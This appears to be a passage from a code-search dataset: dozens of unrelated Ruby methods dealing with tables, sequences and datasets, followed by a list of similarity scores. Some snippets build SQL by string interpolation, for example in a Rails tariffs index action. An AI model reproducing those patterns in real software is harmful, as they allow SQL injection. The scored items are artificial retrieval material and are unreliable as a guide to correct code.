"def sdrm_pr_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"PR\"\n rf_label = 0\n start_codon_number = 1\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = hiv_protease(aa_seq)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def collect\r\n array = []\r\n @table.each do |subarray|\r\n array.concat subarray\r\n end\r\n array\r\n end",
"def make_sequence\n 4.times do\n self.sequence << COLORS.sample\n end\n end",
"def init_table(data=[], options={})\n # TODO : create data array from the df and vector data. So that\n # we can directly use the array.(No need to create df or vector and\n # generate the html table using to_html)\n if data.is_a?(Array)\n data_name = 'series_data'+ SecureRandom.uuid\n data =\n if data.all? { |e| e.class==Array }\n Daru::DataFrame.rows(data, name: data_name)\n else\n Daru::Vector.new(data, name: data_name)\n end\n end\n # options[:data] = data_in_array unless data_in_array.empty?\n @table = Daru::DataTables::DataTable.new(options)\n @data = data\n @table\n end",
"def sequencePrimaries(synsets)\n #\n #A synset's \"primaries\" are those words/phrases in the set; i.e., its collection of synonyms\n #Those synsets (via parameterization) whose synset_t2_map(s) indicates its primaries have\n #not yet been sequenced are done so here. \n #\n progress=0\n synsets.each do |synset|\n unless (synsetmaps=SynsetT2Map.find_all_by_synset_id(synset.synsetid))==[]\n synsetmaps.each do |synmap|\n######Console progress indicator################## \n progress=progress+1\n if progress%9==0\n print '.'\n if progress%100==0\n print \"+\\n\"\n end\n end\n##################################################\n unless ((synmap.th_sequence_id==nil) || \n (synmap.primaries_sequenced) || \n (synmap.th_phrase_definition_id==nil))\n #Add this phrase/definition pair as a ThMember of sequence.\n th_member = ThMember.create(:th_sequence_id => synmap.th_sequence_id,\n :th_phrase_definition_id => synmap.th_phrase_definition_id,\n :ordinality => PRIMARY_ORD,\n :th_mod_info_id => MyDModInfo.id)\n #Set the flag to indicate that the primary word/phrase for this phrase/definition pair\n #has been added as member to the sequence.\n synmap.update_attribute(:primaries_sequenced, TRUE)\n end\n end\n end\n end\n end",
"def columns\n orig_dataset.columns\n end",
"def index\n @tariffs = Tariff.all\n\n connection = ActiveRecord::Base.connection\n quantitative = []\n categorical = []\n values = []\n Tariff.first.properties.each do |k,v|\n if v.is_a? String\n r1 = connection.select_all(\"SELECT properties->>'\" + k + \"' AS property FROM tariffs\").rows\n categorical << r1 if r1.uniq.length > 1\n else\n r2 = connection.select_all(\"SELECT properties->>'\" + k + \"' AS property FROM tariffs\").rows.flatten\n values << r2.collect{|s| s.to_i}\n quantitative << k\n end\n end\n\n temp = categorical.flatten.uniq\n rows = sequence(temp.length)\n\n @header = temp # | quantitative\n @rows = rows # | values\n\n # @test = values\n\n #data_set = Daru::DataFrame.from_csv \"logistic_mle.csv\"\n #glm = Statsample::GLM.compute data_set, :y, :logistic, {constant: 1, algorithm: :mle}\n\n # Options hash specifying addition of an extra constants\n # vector all of whose values is '1' and also specifying\n # that the MLE algorithm is to be used.\n\n #@test = glm.coefficients\n #=> [0.3270, 0.8147, -0.4031,-5.3658]\n #puts glm.standard_error\n #=> [0.4390, 0.4270, 0.3819,1.9045]\n #puts glm.log_likelihood\n\n\n #p sequence(3) #=>[[0, 0, 0], [0, 0, 1], [0, 1, 0], [0, 1, 1], [1, 0, 0], [1, 0, 1], [1, 1, 0], [1, 1, 1]]\n end",
"def subject_ids\n self.get_civet_outputs.map(&:dsid)\n end",
"def table_to_array_of_arrays(table=@table)\n array = []\n table.rows.each do |row|\n row_array = []\n row.data.each_with_index do |column, index|\n data = {:text => column}\n if row.cell_format.is_a? Hash\n data.reverse_merge! row.cell_format\n elsif row.cell_format.is_a? Array\n data.reverse_merge! row.cell_format[index]\n end\n row_array << Prawn::Table::Cell.new(data)\n end\n array << row_array\n end\n array\n end",
"def ndata; end",
"def reset_id_seq *tables\n tables.each do |table|\n sql \"SELECT setval('#{table}_id_seq',max(id)) FROM #{table}\"\n end\n end",
"def query_to; @seq1.to; end",
"def sen_settg(row,column); det.table(:index, 12)[row][column]; end",
"def get_table_set\n P2::Application.reset CLIENT_INI\n @conn = P2::Connection.new :app_name => 'RecordTest',\n :host => \"127.0.0.1\", :port => 4001\n @conn.Connect\n\n @ds = P2::DataStream.new :stream_name => 'RTS_INDEX_REPL',\n :type => P2::RT_COMBINED_DYNAMIC\n\n @ds.Open(@conn)\n\n @ds.events.on_event { |*args| p args }\n 2.times { @conn.ProcessMessage2(1000) } # Push @ds to receive its TableSet\nend",
"def to_array(dataset)\n dataset.map do |row|\n entity_class.new row\n end\n end",
"def train_set\n data_input = data_output = @data_input\n data_input.delete_at(data_input.index(data_input.last))\n data_output.delete_at(data_output.index(data_output.first))\n RubyFann::TrainData.new(inputs: data_input,\n desired_outputs: data_output)\n end",
"def sequence_hunter(head)\n\tarr_arrs = []\n\t\n\tarr_values = []\n\tarr_values.push(node.value)\n\n\t#nope, giving up after an hour\n\t#basically we need to generate an array of each level\n\t#but good fucking luck\nend",
"def to_tsvectors\n []\n end",
"def query_from; @seq1.from; end",
"def get_valid_model_table(table)\n new_table = []\n unless table.empty?\n length_table = table.size\n (0..length_table - 1).each do |row_index|\n cells_added = 0\n original_row = [].concat(table[row_index])\n new_table[row_index] = [] if new_table.size <= row_index\n length_row = original_row.size\n (0..length_row - 1).each do |cell_index|\n cell = original_row[cell_index]\n new_cell_index = cell_index + cells_added\n new_row = new_table[row_index]\n until new_row[new_cell_index].nil?\n cells_added += 1\n new_cell_index = cell_index + cells_added\n end\n new_row[new_cell_index] = cell\n\n next unless cell.has_attribute?('rowspan')\n\n rowspan = cell.get_attribute('rowspan').to_i\n\n next unless rowspan > 1\n\n (1..rowspan - 1).each do |rowspan_index|\n new_row_index = row_index + rowspan_index\n new_table[new_row_index] = [] if new_table[new_row_index].nil?\n new_table[new_row_index][new_cell_index] = cell\n end\n end\n end\n end\n new_table\n end",
"def my_transpose\n\n end",
"def sampling_data(fun, v1=vv1, v2=vv2, repeat1=30, plan=NULL)\n len = v1.length\n data1 = Array.new(len, 0)\n len.times {|factor1|\n data1[factor1] = make_data_set(fun, v1, v2, factor1, repeat1, plan)\n }\n\n print \"sampling_data data is \\n\"\n p data1\n\n data1\nend",
"def data_attributes\n @schema.schema.select {|k,_| k.to_s.start_with?('data_') or k.to_s.start_with?('data-')}.inject({}) {|col,(k,v)| col[k[5..-1].to_sym]=v;col}\n end",
"def table_entry\n unless defined? @table_entry\n table = Disassembler.class_variable_get(\"@@decoding_table\")\n @table_entry = table_entry_helper(table, :opcode).select do |(_,instr)|\n (@raw & ~instr.mask) == 0\n end.sort do |(_,instr1),(_,instr2)|\n instr1.operands.length <=> instr2.operands.length\n end.first\n end\n @table_entry\n end",
"def get_table_data(data, key)\n raw_data = []\n table_data = []\n index = 0\n k0 = 0\n data[key].sort_by{\n # Sort the table by the identifiers (e.g. Microarchitecture, or Microarchitecture + CPU name).\n # This colum is either just a text field, or a more complex hash with a :sort key that should be\n # used for sorting.\n |k, _v| k.map { |c| c.kind_of?(Hash) ? c[:sort] : c }\n }.to_h.each { |k, v|\n k0 = k if index == 0\n index += 1\n elts = v.sort.to_h.values\n raw_data << elts\n table_data << k.map{ |e| e.kind_of?(Hash) ? \"data-sort-value=\\\"#{e[:sort]}\\\"|#{e[:text]}\" : \"data-sort-value=\\\"#{index.to_s.rjust(3, '0')}\\\"|#{e}\" } +\n elts.map{ |e| e.kind_of?(Hash) ? \"data-sort-value=\\\"#{e[:sort]}\\\"|#{e[:text]}\" : e }\n .map{ |e| e == 0 ? '' : e } + [\"'''#{elts.reduce(:+)}'''\"]\n }\n elts = raw_data.transpose.map{ |e| e.reduce(:+)}\n table_data << {columns: [\"'''Sites total'''\"] +\n [' '] * (k0.length - 1) +\n (elts + [elts.reduce(:+)]).map{ |e| e == 0 ? '' : \"'''#{e}'''\" },\n sort: false}\n end",
"def omim_ids\n @table.keys\n end",
"def next_serial_number\n serial = permute(permute(@offset % BOUNDARY))\n @offset += STEP\n serial\n end",
"def dataset\n @@dataset\n end",
"def getFtsSequences\n @gb.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n loc = \"c#{ft.locations[0].to_s}\" if ft.locations[0].strand == -1\n gene = []\n product = []\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n dna = getDna(ft,@gb.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{loc}|#{ftH[\"protein_id\"][0]}|#{gene[0]}|#{product[0]}|#{@org}\",60)\n puts seqout\n end\nend",
"def primary_key_sequence(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_key_sequences[quoted_table] if @primary_key_sequences.has_key?(quoted_table)}\n cond = {Sequel[:t][:oid] => regclass_oid(table, opts)}\n value = if pks = _select_serial_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], pks[:sequence]))\n elsif pks = _select_custom_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], LiteralString.new(pks[:sequence])))\n end\n\n Sequel.synchronize{@primary_key_sequences[quoted_table] = value} if value\n end",
"def assign_starts_of_streams_to_sets(sets,hw)\n stream_labels = []\n stream_starts_at_set = 1\n hw.each { |stream|\n stream_starts_at_set = stream_starts_at_set+stream[\"delay\"].to_i\n if stream_labels[stream_starts_at_set].nil? then\n stream_labels[stream_starts_at_set]=stream[\"stream\"]\n else\n stream_labels[stream_starts_at_set] = stream_labels[stream_starts_at_set]+';'+stream[\"stream\"]\n end\n }\n 1.upto(sets.length-1) { |set_number|\n if stream_labels[set_number].nil? then stream_labels[set_number]='' end\n #print \"=== #{set_number}->#{stream_labels[set_number]}\\n\"\n }\n return stream_labels\nend",
"def inferDataTypes( dataset, year, filename, tablename, single_point_as_dec, nameEditor )\n file = File.new( filename, 'r' );\n line = 0\n maxvals = []\n n = 0\n topline = []\n CSV.foreach( file, { col_sep:\"\\t\" } ){\n |elements|\n line += 1\n if( line == 1 )then\n topline = elements\n n = topline.length\n n.times{\n |i|\n maxvals[i] = INT\n }\n # elsif line >= 500 then\n # break;\n else\n i = 0\n elements.each{\n |cell|\n colname = nameEditor.edit( topline[i].downcase() )\n if colname =~ /.*sernum.*/i then\n maxvals[i] = SERNUM \n elsif cell =~ /.*\\/.*/ then\n puts \"infering DATE for #{colname}; cell is |#{cell}|\\n\"\n maxvals[i] = [ maxvals[i], DATE ].max() \n elsif cell =~ /.*[\"'`a-z].*/i then\n maxvals[i] = [ maxvals[i], STRING ].max() \n elsif cell =~ /[0-9]+\\.[0-9]$/ and single_point_as_dec then \n # FIXME exactly one point as decimal XX,1; \n # this is in HSE for industry codes and so on but probably not general\n puts \"infering DECIMAL for #{colname}; cell is |#{cell}|\\n\"\n maxvals[i] = [ maxvals[i], DECIMAL ].max() \n elsif cell =~ /[0-9]+\\.[0-9]+/ or cell =~/^\\.[0-9]+/ or cell =~ /^[0-9]\\.$/ then\n puts \"infering AMOUNT for #{colname}; cell is |#{cell}|\\n\"\n maxvals[i] = [ maxvals[i], AMOUNT ].max() \n # FIXME should we blow up if remainder not obviously an integer?\n else # int of some kind - check for extreme values\n x = cell.to_f()\n if( x > 2147483647.0 ) or ( x < -2147483648.0 )then # out of postgres integer range\n puts \"inferring SERNUM for #{colname}; cell=|#{cell}|\\n\"\n maxvals[i] = [ maxvals[i], SERNUM ].max() \n end\n end # ignore enums for now\n i += 1\n } \n end\n }\n file.close()\n # connection = getConnection()\n n.times{\n |i|\n if maxvals[i] != INT then # since we default to INT anyway\n colname = nameEditor.edit( topline[i].downcase() )\n puts \"changing #{} to #{maxvals[i]}\\n\"\n puts \"#{maxvals[i]} #{dataset}, #{tablename}, #{year}, #{colname}\\n\"\n updateVarType( maxvals[i], dataset, tablename, year, colname ) \n # statement.execute( maxvals[i], dataset, tablename, year, colname ) \n end\n }\n # connection.disconnect()\nend",
"def initialize\n @table = [] # Array contains Arrays of Strings\n @col = 0\n @row = 0\n @total_time = 0\n @total_records = 0\n # omitting separators for now\n end"
] |
[
"0.60077465",
"0.52115154",
"0.5192342",
"0.5162852",
"0.5099557",
"0.5063107",
"0.50618666",
"0.5042069",
"0.5014444",
"0.5005303",
"0.4981823",
"0.49606812",
"0.49182153",
"0.49182153",
"0.49060225",
"0.489107",
"0.48698348",
"0.48606262",
"0.48503137",
"0.48341665",
"0.4829027",
"0.48264205",
"0.48257035",
"0.4798229",
"0.4790644",
"0.47809544",
"0.4778504",
"0.47769713",
"0.47761568",
"0.47659633",
"0.4757272",
"0.4734346",
"0.47327235",
"0.47256058",
"0.47217754",
"0.47167253",
"0.47123584",
"0.47083256",
"0.470438",
"0.46919522",
"0.4682038",
"0.4672165",
"0.46702176",
"0.46692646",
"0.46640435",
"0.46577635",
"0.4656919",
"0.46504804",
"0.46481657",
"0.46283597",
"0.46182525",
"0.46149868",
"0.46121633",
"0.45934203",
"0.4588267",
"0.45819506",
"0.45819506",
"0.4576637",
"0.45728758",
"0.45575884",
"0.4551869",
"0.45476255",
"0.45406893",
"0.4539524",
"0.45307782",
"0.45282468",
"0.45228568",
"0.45206484",
"0.4518097",
"0.451681",
"0.4514961",
"0.45141825",
"0.45115823",
"0.4502356",
"0.44897228",
"0.448601",
"0.44826058",
"0.44781625",
"0.44673342",
"0.4466061",
"0.4463588",
"0.44576827",
"0.4454149",
"0.44405693",
"0.4437539",
"0.4435667",
"0.44259405",
"0.44251204",
"0.44227958",
"0.44226226",
"0.4422365",
"0.44220814",
"0.44189146",
"0.44111055",
"0.44078547",
"0.44059402",
"0.44056466",
"0.44026318",
"0.44007283",
"0.44003806"
] |
0.6579111
|
0
|
Dataset used to determine primary keys for tables
|
def _select_pk_ds
  @_select_pk_ds ||= metadata_dataset.
    from(:pg_class, :pg_attribute, :pg_index, :pg_namespace).
    where{[
      [pg_class[:oid], pg_attribute[:attrelid]],
      [pg_class[:relnamespace], pg_namespace[:oid]],
      [pg_class[:oid], pg_index[:indrelid]],
      [pg_index[:indkey].sql_subscript(0), pg_attribute[:attnum]],
      [pg_index[:indisprimary], 't']
    ]}.
    select{pg_attribute[:attname].as(:pk)}
end
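
# A minimal usage sketch, assuming the adapter context above (the method
# name `primary_key_for` and the :items table are illustrative, not part of
# the source). The dataset yields one row per primary-key column, so a
# lookup reduces to a single-value query; compare the caching
# `primary_key(table, opts)` variant among the negatives below, which calls
# `where_single_value` in exactly this way.
#
#   def primary_key_for(table, opts = {})
#     _select_pk_ds.where_single_value(Sequel[:pg_class][:oid] => regclass_oid(table, opts))
#   end
#
#   primary_key_for(:items)  # => "id" for a conventionally keyed table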
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def primary_key(table)\n t = dataset.send(:input_identifier, table)\n @primary_keys.fetch(t) do\n pk = fetch(\"SELECT RDB$FIELD_NAME FROM RDB$INDEX_SEGMENTS NATURAL JOIN RDB$RELATION_CONSTRAINTS WHERE RDB$CONSTRAINT_TYPE = 'PRIMARY KEY' AND RDB$RELATION_NAME = ?\", t).single_value\n @primary_keys[t] = dataset.send(:output_identifier, pk.rstrip) if pk\n end\n end",
"def primary_key(_table_name)\n []\n end",
"def dataset_need_primary_key?\n true\n end",
"def primary_key_columns\n @columns.values.find_all { |c| c.primary_key? }\n end",
"def dataset_need_primary_key?\n true\n end",
"def primary_keys(table)\n pks = query(<<-end_sql, 'SCHEMA')\n SELECT DISTINCT attr.attname\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = any(cons.conkey)\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n pks.present? ? pks[0] : pks\n end",
"def primary_keys(table)\n row = exec_query(<<-end_sql, 'SCHEMA').rows.map do |row|\n SELECT DISTINCT(attr.attname)\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = cons.conkey[1]\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n row && row.first\n end\n end",
"def dataset_need_primary_key?\n false\n end",
"def primary_key\n unless @primary_key\n pk_column_names = Set.new( primary_key_columns.collect { |c| c.name } )\n unique_indexes = indexes.values.find_all { |i| i.unique? }\n\n pk_result = []\n\n unique_indexes.each do |idx|\n idx_column_names = Set.new( idx.columns.collect { |c| c.name } )\n r = idx_column_names ^ pk_column_names\n if r.size == 0 then\n pk_result = idx.columns\n break\n end\n end\n\n # no joy, see about just using all the columns that say the are primary\n # keys\n if pk_result.empty? then\n pk_result = self.primary_key_columns\n end\n @primary_key = pk_result\n end\n return @primary_key\n end",
"def dataset_need_primary_key?\n false\n end",
"def primary_keys(field)\n sql = \"SELECT #{field.primary_key_col} from #{field.table} \"\n sql += \"#{where_and(sql)} #{field.column} IS NOT NULL \" if field.leave_null\n field.where&.each_pair do |column, value|\n sql += \"#{where_and(sql)} #{column} = #{value} \"\n end\n sql += \"ORDER BY #{field.primary_key_col};\"\n execute(sql).split(\"\\n\")\nend",
"def primary_keys\n ::Kernel.raise Errors::NotImplemented\n end",
"def dataset_key\n :id\n end",
"def pk_and_sequence_for(table_name)\n (owner, table_name) = @connection.describe(table_name)\n\n # RSI: changed select from all_constraints to user_constraints - much faster in large data dictionaries\n pks = select_values(<<-SQL, 'Primary Key')\n select cc.column_name\n from user_constraints c, user_cons_columns cc\n where c.owner = '#{owner}'\n and c.table_name = '#{table_name}'\n and c.constraint_type = 'P'\n and cc.owner = c.owner\n and cc.constraint_name = c.constraint_name\n SQL\n\n # only support single column keys\n pks.size == 1 ? [oracle_downcase(pks.first), nil] : nil\n end",
"def primary_key\n select(&:primary_key?)\n end",
"def keys\n @keys ||= [column_for_order_by(relation), primary_key].compact.uniq\n end",
"def primary_key(table_name, opts=OPTS)\n quoted_table = quote_schema_table(table_name)\n Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}\n out_identifier, in_identifier = identifier_convertors(opts)\n schema, table = schema_or_current_and_table(table_name, opts)\n dataset = metadata_dataset.\n select(:kc__column_name).\n from(Sequel.as(:information_schema__key_column_usage, 'kc')).\n join(Sequel.as(:information_schema__table_constraints, 'tc'),\n [:table_name, :table_schema, :constraint_name]).\n where(:kc__table_name => in_identifier.call(table),\n :kc__table_schema => schema,\n :tc__constraint_type => 'PRIMARY KEY')\n value = dataset.map do |row|\n out_identifier.call(row.delete(:column_name))\n end\n value = case value.size\n when 0 then nil\n when 1 then value.first\n else value\n end\n Sequel.synchronize{@primary_keys[quoted_table] = value}\n end",
"def primary_key_names\n @primary_key_names ||= session.left.primary_key_names(left_table)\n end",
"def key_columns\n @key_columns ||= [\"#{self.table_name}__id\".to_sym]\n end",
"def primary_key table\n return nil unless table\n table = self[table]\n pk = table.column_names.find{ |c| table[c].primary_key? }\n end",
"def primary_key(table_name)\n pk = super\n\n if pk == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n nil\n else\n pk\n end\n end",
"def primary_key\n fields.select { |f| f.key }.map(&:name)\n end",
"def primary_key(table_name)\n 'id' # table.primary_key || 'id'\n end",
"def primary_keys\n cached_fetch(:primary_keys){Array(primary_key)}\n end",
"def primary_key(table_name)\n stmt = @connection.primary_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n result[0] && result[0][3]\n end",
"def table_primary_keys table_name, include_parent_keys = false\n sql = +\"WITH TABLE_PK_COLS AS ( \"\n sql << \"SELECT C.TABLE_NAME, C.COLUMN_NAME, C.INDEX_NAME, C.COLUMN_ORDERING, C.ORDINAL_POSITION \"\n sql << \"FROM INFORMATION_SCHEMA.INDEX_COLUMNS C \"\n sql << \"WHERE C.INDEX_TYPE = 'PRIMARY_KEY' \"\n sql << \"AND TABLE_CATALOG = '' \"\n sql << \"AND TABLE_SCHEMA = '') \"\n sql << \"SELECT INDEX_NAME, COLUMN_NAME, COLUMN_ORDERING, ORDINAL_POSITION \"\n sql << \"FROM TABLE_PK_COLS \"\n sql << \"INNER JOIN INFORMATION_SCHEMA.TABLES T USING (TABLE_NAME) \"\n sql << \"WHERE TABLE_NAME = %<table_name>s \"\n sql << \"AND TABLE_CATALOG = '' \"\n sql << \"AND TABLE_SCHEMA = '' \"\n unless include_parent_keys\n sql << \"AND (T.PARENT_TABLE_NAME IS NULL OR COLUMN_NAME NOT IN ( \"\n sql << \" SELECT COLUMN_NAME \"\n sql << \" FROM TABLE_PK_COLS \"\n sql << \" WHERE TABLE_NAME = T.PARENT_TABLE_NAME \"\n sql << \")) \"\n end\n sql << \"ORDER BY ORDINAL_POSITION\"\n execute_query(\n sql,\n table_name: table_name\n ).map do |row|\n Index::Column.new \\\n table_name,\n row[\"INDEX_NAME\"],\n row[\"COLUMN_NAME\"],\n order: row[\"COLUMN_ORDERING\"],\n ordinal_position: row[\"ORDINAL_POSITION\"]\n end\n end",
"def key\n get_primary_key_value_map[self.class.table_name]\n end",
"def primary_key(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}\n value = _select_pk_ds.where_single_value(Sequel[:pg_class][:oid] => regclass_oid(table, opts))\n Sequel.synchronize{@primary_keys[quoted_table] = value}\n end",
"def primary_key(table_name)\n # TODO: Change this to be a pure mongo lookup by digging into document definitions\n # TODO: Manage _id and id\n id_definition = Mongo::DocumentDefinition.fields_for(table_name).find { |_, field_definition| field_definition['primary_key'] }\n Array(id_definition).first # && id_definition.first || '_id'\n end",
"def primary_key\n return @primary_key if @primary_key\n return 'id' if @id\n \n candidates = @columns.find_all { |col| col.unique }.map { |col| col.name }\n return 'id' if candidates.include? 'id'\n candidates.find { |c| c =~ eval(\"/^#{@name}.*id$/i\") } ||\n candidates.find { |c| c =~ eval(\"/^#{singularize}.*id$/i\") } ||\n candidates.find { |c| c =~ eval(\"/^#{pluralize}.*id$/i\") } ||\n candidates.first\n end",
"def pk(ta, h)\n x = primary_keys[ta]\n if x.is_a?(Array)\n unless x == []\n x = x.map{|ca| h[ca]}\n x if x.all?\n end\n else\n h[x]\n end\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def get_primary_keys \r\n return {\"KtoNr\" => self.KtoNr}\r\n end",
"def primary_key(table)\n pk_and_sequence = pk_and_sequence_for(table)\n pk_and_sequence && pk_and_sequence.first\n end",
"def primary_key(table_name)\n pk_and_sequence = pk_and_sequence_for(table_name)\n pk_and_sequence && pk_and_sequence.first\n end",
"def primary_key\n return @primary_key if @primary_key\n @primary_key = dimension_table.to_s.camelize.constantize.primary_key.to_sym\n rescue NameError => e\n ETL::Engine.logger.debug \"couldn't get primary_key from dimension model class, using default :id\"\n @primary_key = :id\n end",
"def primary_key(table_name) #:nodoc:\r\n sql = \"SELECT COLUMN_NAME FROM (EXECUTE PROCEDURE sp_GetBestRowIdentifier( NULL, NULL, '#{table_name}', NULL, FALSE)) as gbri\"\r\n rs = select(sql)\r\n if !rs.nil? and !rs[0].nil?\r\n strip_or_self(rs[0]['COLUMN_NAME'])\r\n else\r\n nil\r\n end\r\n end",
"def primary_key_names(table_name, options = {})\n return connection.primary_key_names(table_name) if options[:raw]\n \n self.primary_key_names_cache ||= {}\n result = primary_key_names_cache[table_name]\n unless result\n result = manual_primary_keys[table_name] || connection.primary_key_names(table_name)\n primary_key_names_cache[table_name] = result\n end\n result\n end",
"def class_primary_key_fields(klass)\n fields = []\n if klass.primary_key.class == Array || klass.primary_key.class == CompositePrimaryKeys::CompositeKeys\n klass.primary_key.each do |pk|\n fields << [klass.table_name, pk.to_s]\n end\n else\n fields << [klass.table_name, klass.primary_key]\n end\n fields\n end",
"def primary_key(*names)\n names.each do |name|\n attributes[name][:type] = attributes[name][:type].meta(primary_key: true)\n end\n self\n end",
"def primary_key_lookup(pk)\n if sql = @fast_pk_lookup_sql\n sql = sql.dup\n ds = dataset\n ds.literal_append(sql, pk)\n ds.fetch_rows(sql){|r| return ds.row_proc.call(r)}\n nil\n elsif dataset.joined_dataset?\n # SEQUEL5: Remove as joined model datasets are not allowed\n dataset.first(qualified_primary_key_hash(pk))\n else\n dataset.first(primary_key_hash(pk))\n end\n end",
"def pkey\n table = self.class.table_name\n key = get_primary_key_values.first\n return key\n end",
"def pk_and_sequence_for(table) #:nodoc:\n result = query(<<-end_sql, 'PK and serial sequence')[0]\n SELECT columns.column_name, columns.column_default \n FROM primary_keys \n LEFT JOIN columns \n USING(table_name, column_name)\n WHERE primary_keys.table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n \n if result.length == 0\n return nil\n elsif result[0][1].nil?\n return nil\n else\n default_value = result[0][1]\n seq_name = default_value.match(/\\(\\'(\\w+)\\'\\)/).to_a.last\n return [result[0][0], seq_name]\n end\n rescue\n nil\n end",
"def get_pkey_fields(table_struct)\n pkeys = []\n\n table_struct.each do | row |\n pkeys << row[:field] if row[:key] == 'PRI'\n end\n\n pkeys\nend",
"def pk_and_sequence_for(table_name, with_seq_schema = false)\n result = select_rows(\n \"SELECT kc.column_name, \"+\n (with_seq_schema ? \"c.sequence_schema, \" : \"\") +\n \" c.sequence_name \"+\n \"FROM information_schema.table_constraints tc \"+\n \"INNER JOIN information_schema.key_column_usage kc \"+\n \" ON tc.table_schema = kc.table_schema \"+\n \" AND tc.table_name = kc.table_name \"+\n \" AND tc.constraint_name = kc.constraint_name \"+\n \"LEFT JOIN information_schema.columns c \"+\n \" ON kc.table_schema = c.table_schema \"+\n \" AND kc.table_name = c.table_name \"+\n \" AND kc.column_name = c.column_name \"+\n \"WHERE tc.table_schema = CURRENT_SCHEMA \"+\n \" AND tc.table_name = '#{table_name}' \"+\n \" AND tc.constraint_type = 'PRIMARY KEY'\",\n SCHEMA_LOG_NAME\n )\n (result.length == 1) ? result[0] : nil\n rescue\n nil\n end",
"def primary_key\n 'id'\n end",
"def primary_key_lookup(pk)\n if sql = @fast_pk_lookup_sql\n sql = sql.dup\n ds = dataset\n ds.literal_append(sql, pk)\n ds.fetch_rows(sql){|r| return ds.row_proc.call(r)}\n nil\n else\n dataset.first(primary_key_hash(pk))\n end\n end",
"def primary_key(*names)\n names.each do |name|\n attributes[name] = attributes[name].meta(primary_key: true)\n end\n self\n end",
"def extract_key(row)\n row.reject {|column, value| not primary_key_names.include? column }\n end",
"def primary_key\n fail NotImplementedError\n end",
"def key(*fields)\n @primary_key = fields\n before_save :generate_key\n end",
"def primary_key_attribute\n :id\n end",
"def primary_key\n @primary_key\n end",
"def primary_key(table, field)\n execute \"ALTER TABLE #{table} ADD PRIMARY KEY(#{field_list(field)})\"\n end",
"def primary_key\n self[:primary_key]\n end",
"def omim_ids\n @table.keys\n end",
"def primary_key(table_name)\n pk_and_sequence_for(table_name)[0]\n rescue\n nil\n end",
"def key_columns(records)\n raise 'Cannot determine key from empty batch' if records.empty?\n\n first_key = records.first.key\n record_key(first_key).keys\n end",
"def primary_key_type\n \"integer PRIMARY KEY\"\n end",
"def primary_key_name\n @primary_key_name ||= @connection.schema[@table_name.to_s][:primary_key]\n end",
"def sub_querier_keys()\n ret = @columnNames\n ret << :user_id\n ret << :milestone_id\n return ret\n end",
"def primary_key\n @primary_key || 'id'\n end",
"def primary_key(table_name)\n table_name = table_name.to_s\n\n @primary_keys ||= {}\n @primary_keys[table_name] ||= if @registration[:primary_key].present?\n @registration[:primary_key].call(@connection, table_name)\n else\n @connection.primary_key(table_name)\n end\n end",
"def primary_key\n '_id'\n end",
